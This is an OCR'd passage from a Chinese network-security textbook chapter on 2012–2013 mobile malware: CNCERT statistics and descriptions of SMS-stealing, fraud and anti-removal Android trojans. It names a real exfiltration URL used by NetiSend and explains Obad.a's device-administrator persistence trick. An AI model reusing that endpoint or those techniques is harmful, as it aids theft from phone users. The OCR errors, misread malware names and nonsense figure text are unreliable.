联网 的 所 有 安全 威胁 ;终端 的 智能 化 凸显 了 管道 化 的 业务 安全 问题 接 入 带宽 的 提升 加 剧 
了 有 效 资源 的 恶意 利用 。 


10.1.2 移动 互联 网 面临 的 挑战 


中 国 互联 网 协会 黄 澄清 谈 到 产业 发 展 的 现状 时 表示 ， 移 动 互联 网 产业 的 发 展 、 创 新 仍 
存在 巨大 空间 ， 但 “移动 互联 网 领域 网 络 与 信息 安全 问题 面临 严峻 挑战 ”。 

工信部 于 2013 年 4 月 发 布 了 《关于 加 强 移动 智能 终端 进 网 管理 的 通知 》， 对 申请 进 网 
的 移动 智能 终端 操作 系统 和 预 置 应 用 软件 提出 了 管理 要 求 。 该 《通知 》 将 在 2013 年 11 月 
1 日 正式 执行 。 为 推动 《通知 》 和 相关 标准 的 顺利 实施 ， 电 信 管 理 局 已 组 织 了 多 次 针对 相 
关 企业 的 政策 宣讲 、 培 训 活动 ， 积 极 帮助 企业 进行 技术 改造 ， 提 升 移动 智能 终端 的 安全 能 
力 ， 保 障 用 户 个 人 信息 安全 。 
家 互联 网 应 急 中 心 王明华 谈 道 : “针对 恶意 手机 程序 泛滥 的 现状 ， 国 家 互联 网 应 急 
中 心 正在 制定 《移动 互联 网 恶意 程序 黑 名 单 规范 》 和 《移动 互联 网 应 用 自律 白 名 单 规范 》。 
该 标准 出 台 后 ， 安 全 厂家 、 运 营 商 、 应 用 商店 等 可 根据 “ 黑 名 单 ， 内 容 ， 直 接 在 底层 对 恶 
意 软件 进行 屏蔽 ， 从 移动 互联 网 应 用 程序 的 “源头 ”和 “终点 ”两 个 主要 关口 实现 对 恶意 
程序 的 有 效 治理 。 通 过 移动 互联 网 工作 委员 会 组 织 的 这 次 会 议 ， 向 移动 互联 网 厂商 对 该 规 
范 进行 预 热 。” 

移动 互联 网 恶意 程序 一 般 存 在 以 下 一 种 或 多 种 恶意 行为 ,包括 恶意 扣 费 、 信 息 窃 取 、 
远程 控制 、 恶 意 传播 、 资 费 消耗 、 系 统 破坏 、 诱 骗 欺诈 和 流氓 行为 。CNCERT 数据 显示 ， 
2012 年 CNCERT/CC 捕获 及 通过 厂商 交换 获得 的 移动 互联 网 恶意 程序 样本 数量 为 
162 981 个 。 
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(1) 总 体 情况 。 
2012 年 CNCERT/CC 捕获 和 通过 厂商 交换 获得 的 移动 互联 网 恶意 程序 按 行 为 属性 统计 
如 图 10-2 所 示 。 


诱骗 欺诈 ，2.5% 
信息 窃取 ，7.4% 人 系统 破坏 ，1.3% 


远程 控制 ，8.5% = 


数据 来 源 : CNCERT/CC 


图 10-2 2012 年 移动 互联 网 恶意 程序 数量 按 行为 属性 统计 


其 中 ， 恶 意 扣 费 类 的 恶意 程序 数量 仍 居 首位 ， 为 64 807 个 ， 占 39.8%， 流 氓 行为 类 ( 占 
27.7%)、 资 费 消耗 类 ( 占 11.0%) 分 列 第 二 、 三 位 。2012 年 ， CNCERT/CC 组 织 通信 行业 开展 
了 多 次 移动 互联 网 恶意 程序 专项 治理 行动 ， 重 点 打击 的 远程 控制 类 和 信息 窃取 类 恶意 程序 
所 占 比 例 分 别 较 2011 年 的 17.59% 和 18.88% 大 幅度 下 降 至 8.5% 和 7.4%。 按 操作 系统 分 布 
统计 ，2012 年 CNCERT/CC 捕获 和 通过 厂商 交换 获得 的 移动 互联 网 恶意 程序 主要 针对 
Android 平台 ， 共 有 134 494 个 ， 占 82.52%， 位 居 第 一 。 其 次 是 Symbian 平台 ， 共 有 28 452 
个 ， 占 17.46%。 此 外 也 有 少量 的 针对 JPME 平台 的 恶意 程序 。2012 年 ， 针 对 Symbian 平台 
的 恶意 程序 所 占 比 例 较 2011 年 的 60.7% 大 幅 下 降 ， 而 针对 Android 平台 的 恶意 程序 保持 快 
速 增长 的 势头 ， 从 2011 年 的 39.3% 大 幅 增 长 至 82.52%。 这 一 方面 是 由 于 Symbian 平台 的 
市 场 份额 逐渐 萎缩 ，Android 平台 用 户 和 应 用 商店 的 数量 快速 增长 ， 另 一 方面 ， 由 于 
Android 平台 的 开放 性 在 为 程序 开发 人 员 提 供 便利 的 同时 也 使 黑客 易于 掌握 并 编写 恶意 程 
序 。2012 年 移动 互联 网 恶意 程序 数量 按 操作 系统 分 布 如 图 10-3 所 示 。 


JME, 0.02% 


数据 米 源 : CNCERT/ICC 
图 10-3 ”2012 年 移动 互联 网 恶意 程序 数量 按 操作 系统 分 布 


如 图 10-4 所 示 , 按 危害 等 级 统计 , 2012 年 CNCERT/CC 捕获 和 通过 厂商 交换 获得 的 移 
动 互 联网 恶意 程序 中 ， 高 危 的 为 30 937 个 ， 占 19.0%; 中 和 危 的 为 16 036 个 ， 占 9.8%; 低 
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危 的 为 116 008 个 ， 占 71.2%。 相 对 于 2011 年 ， 高 危 、 中 危 移 动 互联 网 恶意 程序 所 占 比 例 
有 所 下 降 ， 低 危 移 动 互 联网 恶意 程序 所 占 比 例 则 有 较 大 幅度 的 增长 。 


数据 来 源 : CNCERT/00 


图 10-4 2012 年 移动 互联 网 恶意 程序 数量 按 危害 等 级 统计 


CNCERT/CC 重点 关注 和 监测 的 几 个 移动 互联 网 恶意 程序 的 感染 和 传播 情况 。 

(2)“ 毒 媒 ” 手 机 恶意 程序 监测 情况 。 

2010 年 9 月 ，“ 毒 媒 ” 手 机 恶意 程序 开始 大 肆 传 播 ，CNCERT/CC 对 其 进行 了 持续 的 
监测 和 处 置 。 经 过 多 次 打击 ，“ 毒 媒 ” 手 机 恶意 程序 感染 用 户 数量 从 最 初 的 每 月 100 万 余 
个 ， 到 2011 年 3 月 以 后 每 月 5 万 个 左右 ， 在 2012 年 5 月 以 后 ， 被 感染 用 户 数 则 维持 在 每 
月 2.5 万 个 左右 ， 治 理工 作 取得 了 较 好 成 效 ， 但 黑客 仍然 在 不 断 地 变换 控制 域名 和 升级 恶 
意 程序 ， 以 逃避 打击 ，2012 年 全 年 仍 有 260 137 个 用 户 感染 “ 毒 媒 ” 手 机 恶意 程序 ， 感 染 
用 户 数 按 月 度 统计 如 图 10-5 所 示 。 
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图 10-5 2012 年 境内 感染 “ 毒 媒 ”恶意 程序 的 用 户 数 按 月 度 统计 (来 源 : CNCERT/CC) 


(3)“ 手 机 山体 ”恶意 程序 监测 情况 。 

“ 手机 出 婴 ” 恶意 程序 自 2010 年 爆发 ， 从 2011 年 年 底 至 2012 年 1 月 感染 的 用 户 
数量 急剧 上 升 ， 达 到 67 万 余 个 ， 这 主要 是 由 于 该 恶意 程序 出 现 了 新 的 变种 并 大 肆 传 播 。 经 
CNCERT/CC 联合 电信 运营 企业 进行 多 次 打击 后 ， 自 2012 年 2 月 起 ， 其 感染 数量 有 了 较 大 
幅度 的 下 降 ， 此 后 月 均 感染 用 户 数 维持 在 30 万 左右 ， 如 图 10-6 所 示 。 
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10-6 ”2012 年 境内 感染 “手机 出 体 ”恶意 程序 的 用 户 数 量 
按 月 度 统计 (来 源 : CNCERT/CC) 


(4) aprivacyNetiSend.d 恶意 程序 监测 情况 。 

a.privacy.NetiSend.d 恶意 程序 于 2012 年 1 月 首次 在 我 国境 内 发 现 ， 主 要 存在 于 国内 的 
各 种 水 货 手 机 固件 ROM 中。 该 程序 安装 后 无 图 标 , 伪装 成 系统 组 件 , 收集 用 户 手 机 的 IMEI 
号 、 手 机 型 号 、ROM 版 本 信息 及 其 他 个 人 信息 ， 并 连接 http://i.51appshop.com/n.php 将 所 
收集 的 信息 发 送 给 服务 端 。 此 外 ， 该 程序 还 具有 拦截 短信 的 行为 。 从 图 10-7 中 可 以 看 出 ， 
该 恶意 程序 感染 的 用 户 数量 平均 每 月 在 15 万 左右 , 对 用 户 隐私 和 个 人 信息 安全 构成 了 极 大 
的 危害 。 
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图 10-7 2012 年 下 半年 境内 感染 a.privacy.NetiSend.d 恶意 程序 的 用 户 数量 
按 月 度 统计 (来 源 : CNCERT/CC) 


(5) s.spread.inst.a 恶意 程序 监测 情况 。 

s.spread.inst.a 是 一 种 恶意 传播 类 的 移动 互联 网 恶意 程序 , 于 2012 年 3 月 在 境内 首次 出 
现 。 安 装 该 程序 时 ， 它 会 偷偷 解压 缩 并 安装 一 个 恶意 模块 ， 强 行 关闭 一 些 常见 的 安全 软件 
进程 ， 使 用 户 手机 处 于 不 设防 状态 ， 然 后 在 后 台 偷 偷 联网 下 载 其 他 的 恶意 程序 。 图 10-8 是 
2012 年 下 半年 境内 感染 s.spread.inst.a 恶意 程序 的 用 户 数量 按 月 度 统计 。 
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10-8 ”2012 年 下 半年 境内 感染 s.spread.inst.a 恶意 程序 的 用 户 数量 
按 月 度 统计 (来 源 : CNCERT/CC) 

(6) sprivacyNewBizb 恶意 程序 监测 情况 。 

s.privacy.NewBiz.b 恶意 程序 于 2012 年 1 月 在 境内 首次 出 现 ， 为 “NewBiz” 恶 意 程序 
家 族 的 变种 。 该 恶意 程序 感染 用 户 手机 后 ， 将 会 释放 一 些 恶意 的 可 执行 文件 偷偷 在 后 台 运 
行 ， 获 取 手 机 IMEI 号 并 通过 短信 发 送 给 指定 的 手机 号 码 ， 同 时 该 恶意 程序 还 会 添加 网 址 
到 手机 浏览 器 书签 中 。 图 10-9 是 2012 年 下 半年 境内 感染 s.privacy.NewBiz.b 恶意 程序 的 用 
户 数量 按 月 度 统计 。 
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10-9 ”2012 年 下 半年 境内 感染 s.privacy.NewBiz.b 恶意 程序 的 用 户 数量 
按 月 度 统计 (来 源 : CNCERT/CC) 


2013 年 上 半年 , 查 杀 的 手机 恶意 软件 达到 51 084 款 , 感染 的 手机 达 2 102 万 部 。 同时， 
移动 互联 网 安全 问题 涉及 芯片 、 操 作 系统 、 应 用 软件 、 应 用 商店 、 云 平台 数据 等 多 个 环节 ， 
甚至 已 形成 黑色 产业 链 。 除 主管 部 门 积极 制定 安全 管理 措施 ， 从 “ 云 ” 到 “ 端 ” 进 行 统筹 
规划 ， 推 进 安全 标准 化 工作 之 外 ， 还 需要 通过 移动 互联 网 工作 委员 会 等 社会 团体 ， 呼 吁 行 
业 自 律 。 
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- 潼 洲 若 兰 壮 。 过 潍 式 侣 睹 册 囊 沼 耳 


10.2 ”移动 互联 网 安全 概况 


10.2.1 手机 病毒 综述 


据 瑞 星 “ 云 安全 ”系统 监测 显示 : 2012 年 1 月 至 12 月 共 截 获 手机 病毒 样本 6 842 个 。 
其 中 ，“ 功 夫 系 列 ”、“ 给 你 米 系列 ”的 家 族 式 病毒 非常 独 狐 。 瑞 星 安全 专家 表示 ， 在 数 
量 和 类 型 上 ，2012 年 的 手机 病毒 有 了 更 多 的 变化 。 尤 其 是 盗 取 用 户 隐私 信息 的 病毒 开始 在 
总 体 数量 上 占据 优势 ， 这 些 恶 意 程序 通常 都 是 利用 App 商店 审查 不 严 的 漏洞 ， 将 自己 乔装 
成 正常 App， 诱 骗 用 户 下 载 安装 。 该 类 App 会 在 后 台 收 集 手 机 通信 录 中 的 信息 ， 同 时 搜索 
手机 短信 内 的 关键 字 ， 并 读 取 相关 信息 ， 最 终 发 送 至 黑客 指定 的 网 址 。 

目前 一 些 正常 的 App 程序 也 出 现 带 有 恶意 推广 代码 的 现象 。 有 些 是 开发 者 迫 于 生存 压 
力 在 程序 代码 中 添加 的 ， 有 些 则 是 不 法 分 子 利用 黑客 手段 恶意 植 入 的 。 


10.2.2 近期 手机 安全 焦点 事件 


2013 年 上 半年 ， 出 现 了 一 批 利 用 手机 短信 作恶 的 手机 木马 及 恶意 软件 ， 例 如 会 群发 诈 
骗 短 信 的 “欺诈 信使 ”， 可 以 劫持 用 户 短信 验证 码 的 “支付 鬼 手 ”等 。 与 此 同时 ， 针 对 微 
信 的 恶意 软件 及 相关 诈骗 行为 大 量 涌现 。 

1. “欺诈 信使 ”手机 木马 

2013 年 上 半年 ， 将 手机 短信 功能 作为 传播 途径 的 高 危 手 机 木马 层出不穷 。 这 类 木马 除 
了 窃取 短信 和 内容， 还 能 透 过 短信 功能 实现 暗 扣 费 、 群 发 垃圾 或 诈骗 短信 。 近 期 发 现 的 “ 欺 
诈 信 使 ”手机 木马 就 是 一 个 典型 案例 ， 其 首先 读 取 手机 内 存 和 SIM 卡 内 的 联系 人 信息 ,之 
后 就 会 向 所 有 联系 人 群发 事先 编辑 好 的 诈骗 短信 ， 以 在 KTV 等 私人 场所 被 警察 抓获 为 由 ， 
让 亲友 将 所 谓 的 “保释 金 ” 汇 入 “ 表 哥 澎湖 ”的 银行 账户 ， 如 图 10-10 所 示 。 


PDF 阅读 器 
党 试 发 送 短信 
发 得 给 ; 137623502* 


内 容 ， 策 怕 在 K-T-V 后 寝 拉 到 公 - 安 -局 , 相交 测 款 三 任 ， 
我 表 间 击 湖 已 到 这 里 ， 借 我 一 和 天 左右 


禁止 (17 秒 ) 


图 10-10 “欺诈 信使 ”手机 木马 偷 发 短信 
可 怕 的 是 , 为 防止 短信 接收 者 打 电 话 确认 ,短信 中 特别 强调 “不 方便 接听 电话 ”、“ 不 
要 告诉 别人 ”， 欺 骗 短 信 接 收 者 。 此 外 ， 短 信 发 送 成 功 后 ， 机 主 手机 短信 记录 中 不 会 有 任 
何 显示 ， 隐 蔽 性 极 强 。 
这 种 利用 手机 木马 发 短信 诈骗 的 新 型 短信 欺诈 手段 ， 其 危害 远 超 以 往 的 诈骗 手法 ， 主 
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要 体现 这 以 下 三 个 方面 。 
(1) 任何 人 的 手机 都 可 能 成 为 短信 发 送 者 ， 无 特定 发 送 端口 ， 运 营 商 极 难 监管 。 
(2) 短信 发 送 号 码 为 亲友 ， 较 以 往 陌 生 号 码 更 有 说 服 力 ， 手 机 用 户 很 容易 上 当 。 
G3) 手机 用 户 或 因 来 源 号 码 为 亲友 号 码 ， 放 弃 向 监管 部 门 举报 。 
2. “支付 鬼 手 ”手机 木马 


360 互联 网 安全 中 心 在 2013 年 5 月 截获 一 款 名 为 “支付 鬼 手 ”的 手机 木马 ， 该 木马 在 
进入 用 户 手机 后 ， 一 旦 用 户 通过 这 一 假 淘宝 APP 输入 账号 、 密 码 、 支 付 密码 , “支付 鬼 手 ” 
木马 都 会 将 其 窃取 ， 并 发 送 至 指定 手机 号 码 ， 如 图 10-11 所 示 。 


图 10-11 “支付 鬼 手 ”手机 木马 偷 发 短信 


不 仅 如 此 ，“ 支 付 鬼 手 ”还 会 诱导 用 户 安装 名 为 “账户 安全 服务 ”的 恶意 子 包 ， 全 程 
监控 用 户 短信 ， 只 要 用 户 接 到 短信 ， 都 将 自动 转发 至 指定 号 码 ， 这 其 中 很 可 能 包含 用 户 进 
行 支付 的 验证 码 ， 以 及 修改 密码 需要 用 到 的 验证 信息 ， 一 旦 掌握 了 这 些 数据 ， 用 户 支付 宝 
内 的 财产 将 被 盗号 者 洗劫 一 空 ， 如 图 10-12 所 示 。 


10-12 “支付 鬼 手 ”木马 诱导 用 户 安装 恶意 子 包 
“支付 鬼 手 ”是 目前 唯一 截获 的 ， 具 有 完整 盗窃 支付 账号 能 力 的 手机 木马 。 分 析 发 现 ， 
“支付 鬼 手 ”木马 会 通过 二 维 码 、 论 坛 等 多 渠道 进行 传播 。 恶 意 攻击 者 将 相关 的 二 维 码 图 
片 在 网 站 及 论坛 传播 诱骗 用 户 扫描 下 载 ， 其 安装 包 显 示 名 称 为 “ 旺 信 内 测 版 ”， 还 有 “ 跳 


(Ch >》 计算 机 网 络 安全 (第 2 版 ) 


潼 洲 沼 粮 半 ” 填 潍 R 保 片 由 于 招 卫 


© 


蚤 街 ” 等 名 称 ， 而 实际 上 ， 当 用 户 安装 后 都 是 假 淘宝 应 用 。 

移动 支付 安全 已 成 为 手机 安全 的 新 课题 。 此 前 曾 有 木马 伪装 成 招商 银行 、 建 设 银行 、 
浦发 银行 等 多 款 银行 类 APP， 而 这 些 山寨 APP 很 可 能 会 窃取 用 户 银行 、 信 用 卡 等 支付 
密码 。 

3.“ 微 信 ” 变 “ 危 信 ” 

近期 ， 不 法 分 子 借 微 信 作 恶 的 事件 时 有 发 生 ， 例 如 通过 伪装 成 微 信 消息 提示 诱骗 用 户 
安装 含有 恶意 代码 的 手机 APP， 以 此 牟利 。360 互 联网 安全 中 心 在 2013 年 4 月 还 截获 一 种 可 
让 微 信 弹 广告 的 新 型 恶意 软件 。 

(1) 新 型 手机 木马 伪装 微 信 消息 诱骗 安装 。 

2013 年 2 月 , 360 手机 卫士 独家 截获 34 款 新 型 Android 手机 木马 , 自动 下 载 各 种 软件 ， 
并 伪装 微 信 消息 诱骗 用 户 安装 ， 大 量 消 耗 手机 上 网 流量 ， 甚 至 二 次 传播 手机 木马 进行 恶意 
扣 费 。 这 一 系列 木马 分 别 伪 装 成 包括 “圆桌 骑士 ”、“ 双 截 龙 ”、“ 侍 瑰 ”、“ 三 国志 ”、 
“名 将 ”、“ 雷 电 ”、“ 合 金 弹头 ”等 热门 游戏 ， 并 在 描述 中 加 入 如 “绿色 无 广告 版 ”等 
以 眼球 效应 吸引 用 户 安装 ， 却 在 其 中 均 嵌 有 恶意 代码 ， 如 图 10-13 所 示 。 


图 10-13 ”伪装 热门 游戏 诱骗 安装 


用 户 一 旦 安装 这 些 应 用 程序 ， 手 机 就 会 联网 接收 黑客 通过 服务 器 发 出 的 各 种 指令 ， 远 
程控 制 手机 ， 开 始 联网 自动 下 载 各 种 用 于 流氓 推广 的 应 用 程序 ， 包 括 一 些 手机 浏览 器 、 手 
机 地 图 等 ， 在 下 载 过 程 中 产生 大 量 流量 ， 消 耗 手机 话费 。 

下 载 完 成 后 ， 木 马 会 控制 手机 伪装 “ 微 信 消息 ”弹出 通知 ， 以 “让 你 生活 更 精彩 ”、 
“ 带 你 看 天 下 ”等 推荐 词 引导 用 户 安装 ， 让 人 感觉 是 微 信 推荐 大 家 用 这 些 软 件 ， 但 实际 是 
木马 在 作 崇 。 

(2) 新 型 病毒 致 微 信 等 乱弹 广告 消耗 流量 。 

360 互联 网 安全 中 心 2013 年 4 月 截获 到 一 批 “ 借 刀 杀 人 ”型 手机 病毒 ， 与 以 往 乱 弹 广 
告 的 病毒 不 同 的 是 ， 其 本 身 并 不 弹 广告 ， 反 而 让 正常 的 微 博 、 微 信 等 应 用 频频 弹出 广告 ， 
不 但 消耗 流量 , 更 让 用 户 误 以 为 是 厂商 自行 投放 的 广告 , 极 大 伤害 了 用 户 体验 及 厂商 品牌 
十 分 阴险 。 据 统计 ， 携 带 此 恶意 广告 插件 的 恶意 软件 将 近 300 余 款 ， 感染 量 多 达 31 万 ， 如 
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图 10-14 所 示 。 


这 一 次 ,我 们 本 新 是 义 对 斌 加 


图 10-14 ”病毒 使 微 信 、 微 博 频繁 弹出 恶意 广告 


用 户 在 安装 携带 该 恶意 广告 插件 的 应 用 后 (如 “网 址 导航 ”“ 铁 拳 3D ”等 均 已 被 算 改 
植 入 )， 病 毒 就 会 暗中 在 后 台 启 动 监控 服务 功能 ， 通 过 获取 服务 器 指令 ， 自 动 检测 判断 手机 
中 是 否 含有 微 信 、 微 博 等 应 用 ， 随 即 在 这 些 正 常 应 用 界面 中 频繁 弹出 “精品 推荐 ”等 不 同 
类 别 的 广告 。 

不 法 开发 者 将 恶意 广告 代码 植 入 热门 应 用 已 成 普遍 现象 ， 但 无 论 从 危害 性 和 隐蔽 性 来 
说 ， 都 不 如 此 次 发 现 的 “ 借 刀 杀人 ”型 行为 恶劣 。 由 于 微 博 、 微 信 等 使 用 频率 高 ， 一 旦 被 
恶意 软件 挟持 进行 广告 弹 窗 ， 极 易 导 致 用 户 误 点 ， 同 时 还 会 造成 对 微 信 、 微 博 频繁 弹 窗 的 
误解 。 

(3) 利用 微 信 “钓鱼 ”。 

2013 年 上 半年 ， 微 信 盗 号 事件 频 发 引起 广泛 关注 。 相 比 QQ， 微 信 好 友 都 是 实时 在 线 ， 
信息 随时 推送 ， 所 以 微 信 被 盗 后 的 诈骗 速度 更 快 、 范 围 也 更 广 。 同 时 ， 微 信 联 系 的 朋友 基 
于 熟人 圈子 ， 诈 骗 者 如 鱼 得 水 ， 这 也 从 侧面 反映 出 隐私 泄露 的 危害 性 。 

通过 被 盗 微 信 ， 和 群发 钓鱼 网 站 盗 取 QQ 账号 成 为 骗子 的 惯用 手法 。 骗 子 通常 以 “在 吗 ， 
问 你 个 事 ， 这 个 女 的 你 认识 吗 ……” 等 诱惑 性 内 容 开 始 ， 勾 起 好 友 的 好 奇 心 ， 紧 接着 就 发 
来 一 个 钓鱼 网 站 链接 ， 诱 惑 好 友 点 击 ， 盗 取 QQ 账号 ， 进 而 实施 诈骗 ， 如 图 10-15 所 示 。 


你 手机 中 大 了 7? 硬 
和 i 
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图 10-15 盗号 者 通过 微 信 发 送 钓鱼 链接 ， 骗 取 QQ 号 及 密码 
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4. 三 星 Galaxy S4 曝 高 危 短 信和 欺诈 漏洞 

360 互联 网 安全 中 心 2013 年 6 月 17 日 独家 发 现 三 星 Galaxy S4 这 款 手机 存在 一 个 高 危 
短信 欺诈 漏洞 。 利 用 该 漏洞 ， 恶 意 软件 可 在 后 台 偷 发 扣 费 短信 ， 或 伪造 任意 发 送 号 码 在 中 
招手 机 收 件 箱 中 写 入 诈骗 短信 ， 对 机 主 进行 恶意 扣 费 或 欺诈 。 除 S4 用 户外 ， 不 排除 部 分 搭 
载 三 星 “ 云 备份 ”组 件 的 三 星 的 其 他 机 型 也 受 新 短信 欺诈 漏洞 威胁 。 

新 漏洞 存在 于 三 星 S4 的 “ 云 备 份 ”组 件 ， 该 系统 组 件 并 不 会 校 验 数 据 发 送 者 的 身份 。 
这 直接 导致 恶意 软件 可 以 在 不 申请 发 送 短 信和 存 取 短信 权限 的 情况 下 ， 向 任何 号 码 发 送 任 
何 内 容 的 短信 。 例 如 ， 伪 造 帮 其 他 手机 号 码 充值 ， 以 骗 财 为 目的 的 诈骗 短信 ， 甚 至 直接 发 
送 SP 定制 短信 扣 费 。 

更 严重 的 是 ， 利 用 该 漏洞 ， 任 何 第 三 方程 序 都 能 冒充 亲友 、 银 行 等 机 构 组 织 、 客 户 服 
务 商 等 ， 肆 意 伪 造 含有 诈骗 内 容 的 短信 或 彩信 ， 并 以 未 读 状 态 暗中 放 入 短信 收 件 箱 中 ， 吸 
引 手 机 用 户 上 钧 ， 如 图 10-16 所 示 。 


三 星 GS4 备 份 组 伯 漏 润 。 (Coq 
© sermemematwen 
误区 站 证 阅 ， 友 议 广 入 这 宣 和 放流 着 总 
伪造 短 信 的 软件 ， 骨 会 立即 拦 难 并 提醒 您 及 上 
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10-16 ”360 手机 卫士 提供 的 补丁 
5. 难 和 卸载 反 查 杀 的 超级 Android 木马 


“Backdoor.AndroidOS.Obad.a” 具 备 “ 反 查 杀 、 难 解析 、 难 卸载 ”等 特性 ， 是 迄今 为 
止 发 现 的 结构 最 复杂 的 高 级 Android 木马 。 该 木马 目的 仍 是 偷 发 短信 为 手机 定制 扣 费 业务 ， 
同时 ， 木 马 还 会 下 载 更 多 恶意 软件 。 此 外 ， 为 了 在 短 时 间 内 感染 更 多 设备 ， 已 被 感染 的 手 
机 还 会 被 控制 自动 搜索 其 他 蓝牙 设备 ， 发 送 恶意 软件 并 远程 执行 木马 命令 进行 安装 。 

其 独特 之 处 在 于 ， 该 木马 具备 的 三 层 防 查 杀 特 性 。 

第 一 层 ， 封 堵 病 毒 分 析 主 要 入 口 阻止 安全 工程 师 获取 安全 信息 。 

360 手机 安全 专家 发 现 ， 该 木马 为 逃避 杀毒 软件 查 杀 而 费 尽 心机 。 它 在 代码 中 采取 了 


NNN ES 


一 些 专门 针对 病毒 分 析 人 员 的 措施 ， 为 安全 公司 分 析 它 增加 难度 。 例 如 ， 很 多 安全 公司 分 
析 Android 木马 样本 时 , 通常 采用 AXML 解析 工具 来 解析 样本 主 配置 文件 androidManifest. 
xml 文件 。 该 文件 包含 了 Android 应 用 的 主要 模块 入 口 信息 ， 是 木马 分 析 时 的 重要 线索 。 
Obad.a 木马 故意 构造 了 一 个 非 标 准 的 AndroidManifest.xml 文件 ,使 得 病毒 分 析 人 员 无 法 得 
到 完整 数据 。 

第 二 层 ， 对 指令 代码 进行 特殊 处 理 阻止 反 编译 。 

该 木马 除了 对 代码 进行 加 密 处 理 以 外 ， 还 通过 对 指令 代码 进行 特殊 处 理 ， 使 得 安全 公 

司 常用 的 Java 反 编译 工具 无 法 正确 地 反 编 译 其 指令 ， 增 加 对 木马 的 分 析 难 度 。 

第 三 层 : 利用 系统 缺陷 阻止 用 户 务 载 。 

该 木马 为 防止 被 用 户 发 现 后 卸载 仇 费 苦心 。Android 系统 从 2.2 版 本 开始 ， 提 供 了 一 个 
“设备 管理 器 ”的 功能 ， 其 初衷 是 为 企业 部 署 远 程 IT 控制 使 用 ， 为 了 防止 员工 私自 印 载 企 
业 安 装 的 “设备 管理 器 ”， 一 旦 激活 设备 管理 器 之 后 ， 该 设备 管理 器 就 不 可 删除 。 但 是 ， 
由 于 Android 系统 对 此 功能 设计 的 不 完善 ， 使 得 木马 可 以 利用 这 个 机 制 ， 让 自己 注册 成 为 

-个 设备 管理 器 , 从 而 阻止 用 户 务 载 。 木马 首先 会 提示 用 户 “ 激 活 设备 管理 器 ”, 如 图 10-17 
所 示 。 

而 一 旦 用 户 不 慎 点 了 “激活 ”， 那么 木马 就 被 注册 成 了 设备 管理 器 ， 此 时 该 木马 的 “ 强 

行 停止 ”和 “外 载 ”按钮 将 完全 失效 ， 即 ， 木 马 无 法 关闭 ， 也 无 法 卸载 ， 如 图 10-18 所 示 。 


32.00KB 
清除 缓存 


图 10-17 木马 诱骗 激活 图 10-18 “强行 停止 和 “和 邱 载 ”按钮 失效 

目前 ， 此 类 设备 管理 器 都 存在 一 定 缺 陷 ， 当 木马 故意 以 一 种 错误 的 方式 来 注册 设备 管 
理 器 时 ，Android 系统 也 能 让 它 注 册 成 功 ,， 但 是 在 设备 管理 器 列表 中 不 会 显示 ,用 户 因此 找 
不 到 取消 注册 设备 管理 器 入 口 ， 无 法 取消 木马 的 设备 管理 权限 ， 系 统 中 甚至 不 会 列 出 木马 
所 注册 的 设备 管理 器 ， 那 么 木马 便 可 随意 在 被 感染 手机 中 作恶 ， 极 具 威 胁 ， 如 图 10-19 
所 示 。 

360 手机 安全 专家 介绍 ， 当 “Backdoor.AndroidOS.Obad.a” 木 马 试图 窃取 用 户 隐 私 、 发 
送 短 信 吸 费时 ，360 手机 卫士 的 主动 防御 系统 会 进行 拦截 ， 提 醒 用 户 木 马 正在 尝试 获取 本 
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机 号 码 等 危险 操作 ， 如 图 10-20 所 示 。 


图 10-19 “设备 管理 器 ”列表 内 容 为 空 图 10-20 ”提示 木马 获取 本 机 号 码 
10.3 ”移动 互联 网 发 展 形势 


10.3.1 移动 互联 网 应 用 发 展 趋势 


人 民 网 研究 院 在 近日 发 布 的 2013 年 中 国 《移动 互联 网 蓝皮书 》 中 指出 ， 在 短 短 几 年 时 
间 里 ， 移 动 互联 网 已 渗透 到 社会 生活 的 方方面面 ， 但 它 仍 处 在 发 展 的 早期 ，“ 变 化 ” 仍 是 
它 的 主要 特征 ， 革 新 是 它 的 主要 趋势 。 未 来 其 发 展 趋势 大 致 为 以 下 几 点 。 

(1) 移动 互联 网 超越 PC 互联 网 ， 引 领 发 展 新 潮流 。 

有 线 互联 网 (又 称 PC 互联 网 、 桌 面 互联 网 、 传 统 互 联网 ) 是 互联 网 的 早期 形态 ,移动 互 
联网 (无 线 互联 网 ) 是 互联 网 的 未 来 。PC 机 只 是 互联 网 的 终端 之 一 ， 智 能 手机 、 平 板 电脑 、 
电子 阅读 器 ( 电 纸 书 ) 已 经 成 为 重要 终端 ， 电 视 机 、 车 载 设备 正在 成 为 终端 ， 冰箱、 微波 炉 、 
抽 油 烟 机 、 照 相机 ， 甚 至 眼镜 、 手 表 等 穿戴 之 物 ， 都 可 能 成 为 泛 终端 。 

(2) 移动 互联 网 和 传统 行业 融合 ， 催 生 新 的 应 用 模式 。 

在 移动 互联 网 、 云 计算 、 物 联网 等 新 技术 的 推动 下 ， 传 统 行业 与 互联 网 的 融合 正在 呈 
现 出 新 的 特点 ， 平 台 和 模式 都 发 生 了 改变 。 这 一 方面 可 以 作为 业务 推广 的 一 种 手段 ， 如 食 
品 、 餐 饮 、 娱 乐 、 航空、 汽车 、 金 融 、 家 电 等 传统 行业 的 APP 和 企业 推广 平台 ; 另 一 方面 
也 重 构 了 移动 端的 业务 模式 ， 如 医疗 、 教 育 、 旅 游 、 交 通 、 传 媒 等 领域 的 业务 改造 。 

(3) 不 同 终端 的 用 户 体验 更 受 重视 ， 助 力 移动 业务 普及 扎根 。 

2011 年 ， 主 流 的 智能 手机 屏幕 是 3.5~~4.3 英寸 ,2012 年 发 展 到 4.7 一 5.0 英寸 ， 而 平板 
电脑 却 以 mini 型 为 时 墅 。 但 是 ， 不 同 大 小 屏幕 的 移动 终端 ， 其 用 户 体验 是 不 一 样 的 ， 适 应 
小 屏幕 的 智能 手机 的 网 页 应 该 轻便 、 轻 质 化 ， 它 承载 的 广告 也 必须 适应 这 一 要 求 。 而 目前 ， 
大 量 互 联网 业务 迁移 到 手机 上 ， 为 适应 平板 电脑 、 智 能 手机 及 不 同 操作 系统 ， 开 发 了 不 同 
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的 APP，HTML5 的 自 适 应 较 好 地 解决 了 阅读 体验 问题 ， 但 是 ， 还 远 未 实现 轻便 、 轻 质 、 
人 性 化 ， 缺 乏 良好 的 用 户 体验 。 

(4) 移动 互联 网 商业 模式 多 样 化 ， 细 分 市 场 继续 发 力 。 

随 着 移动 互联 网 发 展 进入 快车 道 ， 网 络 、 终 端 、 用 户 等 方面 已 经 打 好 了 坚实 的 基础 ， 
不 便利 的 情况 已 开始 改变 , 移动 互联 网 已 融入 主流 生活 与 商业 社会 , 货币 化 浪潮 即将 到 来 。 
